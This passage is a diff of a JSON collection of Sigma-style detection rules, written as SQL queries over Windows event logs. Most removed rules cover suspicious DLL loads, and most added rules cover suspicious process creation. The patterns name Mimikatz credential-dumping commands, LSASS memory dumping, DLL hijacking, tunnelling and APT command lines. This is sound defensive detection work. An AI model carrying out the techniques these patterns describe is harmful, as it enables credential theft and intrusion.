'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": 
"image_load_side_load_aruba_networks_virtual_intranet_access.yml" + "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" }, { - "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", - "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", + "title": "Potential PowerShell Obfuscation Via WCHAR", + "id": "e312efd0-35a1-407f-8439-b8d434b438a6", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Detects suspicious encoded character syntax often used for defense evasion", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" ], - "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" + "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" }, { - "title": "DLL Load By System Process From Suspicious Locations", - "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", + "title": "Potential Signing Bypass Via Windows Developer Features", + "id": "a383dec4-deec-4e6e-913b-ed9249670848", "status": "experimental", - "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a 
suspicious location such as %temp%", + "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" ], - "filename": "image_load_susp_dll_load_system_process.yml" + 
"filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack", - "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "title": "Execution via WorkFolders.exe", + "id": "0bbc6369-43e3-453d-9944-cae58821c173", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", + "author": "Maxime Thiebaut (@0xThiebaut)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the uncommon Windows Work Folders feature." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" ], - "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "proc_creation_win_susp_workfolders.yml" }, { - "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", - "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", - "status": "experimental", - "description": "Detects the image load of vss_ps.dll by uncommon executables", - "author": "Markus Neis, @markus_neis", + "title": "Suspicious Plink Port Forwarding", + "id": "48a61b29-389f-4032-b317-b30de6b95314", + "status": "test", + "description": "Detects suspicious Plink tunnel port forwarding to a local port", + "author": "Florian Roth 
(Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "Administrative activity using a remote port forwarding to a local port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "image_load_dll_vss_ps_susp_load.yml" + "filename": 
"proc_creation_win_plink_port_forwarding.yml" }, { - "title": "DLL Sideloading Of ShellChromeAPI.DLL", - "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", - "status": "experimental", - "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - PurpleSharp Execution", + "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "status": "test", + "description": "Detects the execution of the PurpleSharp adversary simulation tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1587", + "attack.resource_development" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_shell_chrome_api.yml" + "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" }, { - "title": "Potential DLL Sideloading Via comctl32.dll", - "id": "6360757a-d460-456c-8b13-74cf0e60cceb", + "title": "PUA - 3Proxy Execution", + "id": "f38a82d2-fba3-4781-b549-525efbec8506", "status": "experimental", - "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", + "description": 
"Detects the use of 3proxy, a tiny free proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unlikely" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_comctl32.yml" + "filename": "proc_creation_win_pua_3proxy_execution.yml" }, { - "title": "Svchost DLL Search Order Hijack", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", - "status": "test", - "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", - "author": "SBousseaden", + "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", + "id": 
"065b00ca-5d5c-4557-ac95-64a6d0b64d86", + "status": "experimental", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1574.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use of AnyDesk from a non-standard folder" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_svchost_dlls.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" }, { - "title": "HackTool - SharpEvtMute DLL Load", - "id": "49329257-089d-46e6-af37-4afce4290685", - "status": "experimental", - "description": "Detects the load 
of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential MuddyWater APT Activity", + "id": "36222790-0d43-4fe8-86e4-674b27809543", + "status": "test", + "description": "Detects potential Muddywater APT activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.g0069" ], "falsepositives": [ - "Other DLLs with the same Imphash" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" ], - "filename": "image_load_hktl_sharpevtmute.yml" + "filename": "proc_creation_win_apt_muddywater_activity.yml" }, { - "title": "HackTool - SILENTTRINITY Stager DLL Load", - "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", + "title": "Potential ACTINIUM Persistence Activity", + "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", "status": "test", - "description": "Detects 
SILENTTRINITY stager dll loading activity", - "author": "Aleksey Potapov, oscd.community", + "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.command_and_control", - "attack.t1071" + "attack.persistence", + "attack.t1053", + "attack.t1053.005" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE Description LIKE '%st2stager%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" ], - "filename": "image_load_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_apt_actinium_persistence.yml" }, { - "title": "Possible Process Hollowing Image Loading", - "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", - "status": "test", - "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", - "author": "Markus Neis", + "title": "Sdiagnhost Calling Suspicious Child Process", + "id": "f3d39c45-de1a-4486-a687-ab126124f744", + "status": "experimental", + "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. 
used in exploits for Follina / CVE-2022-30190)", + "author": "Nextron Systems", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1036", + "attack.t1218" ], "falsepositives": [ - "Very likely, needs more tuning" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\'))" ], - "filename": "image_load_susp_uncommon_image_load.yml" + "filename": "proc_creation_win_sdiagnhost_susp_child.yml" }, { - "title": "Suspicious UltraVNC Execution", - "id": "871b9555-69ca-4993-99d3-35a59f9f3599", + "title": "HackTool - Mimikatz Execution", + "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", "status": "test", - "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. 
startup (as seen being used by Gamaredon threat group)", - "author": "Bhabesh Raj", + "description": "Detection well-known mimikatz command line arguments", + "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", "tags": [ - "attack.lateral_movement", - "attack.g0047", - "attack.t1021.005" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ultravnc_susp_execution.yml" + "filename": 
"proc_creation_win_hktl_mimikatz_command_line.yml" }, { - "title": "Suspicious File Execution From Internet Hosted WebDav Share", - "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", - "status": "experimental", - "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files", - "author": "pH-T (Nextron Systems)", + "title": "Suspicious Rundll32 Activity Invoking Sys File", + "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", + "status": "test", + "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" + "filename": "proc_creation_win_rundll32_sys.yml" }, { - "title": "Renamed PAExec Execution", - "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", - "status": "test", - "description": "Detects execution of renamed version of PAExec. 
Often used by attackers", - "author": "Florian Roth (Nextron Systems), Jason Lynch", + "title": "Mshtml DLL RunHTMLApplication Abuse", + "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", + "status": "experimental", + "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" + }, + { + "title": "CMSTP Execution Process Creation", + "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", - "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. 
Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\paexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_paexec.yml" + "filename": "proc_creation_win_cmstp_execution_by_creation.yml" }, { - "title": "PUA - Radmin Viewer Utility Execution", - "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", + "title": "ZOHO Dctask64 Process Injection", + "id": "6345b048-8441-43a7-9bed-541133633d7a", "status": "test", - "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", - "author": "frack113", + "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1072" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR 
OriginalFileName = 'Radmin.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_radmin.yml" + "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Execution", - "id": "93bbde78-dc86-4e73-9ffc-ff8a384ca89c", + "title": "Suspicious Add Scheduled Command Pattern", + "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", "status": "experimental", - "description": "Detects execution of known compromised version of 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious scheduled task creations with commands that are uncommon", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate usage of 3CXDesktopApp" + "Software installers that run from temporary folders and also install scheduled tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((OriginalFileName = '3CXDesktopApp.exe' 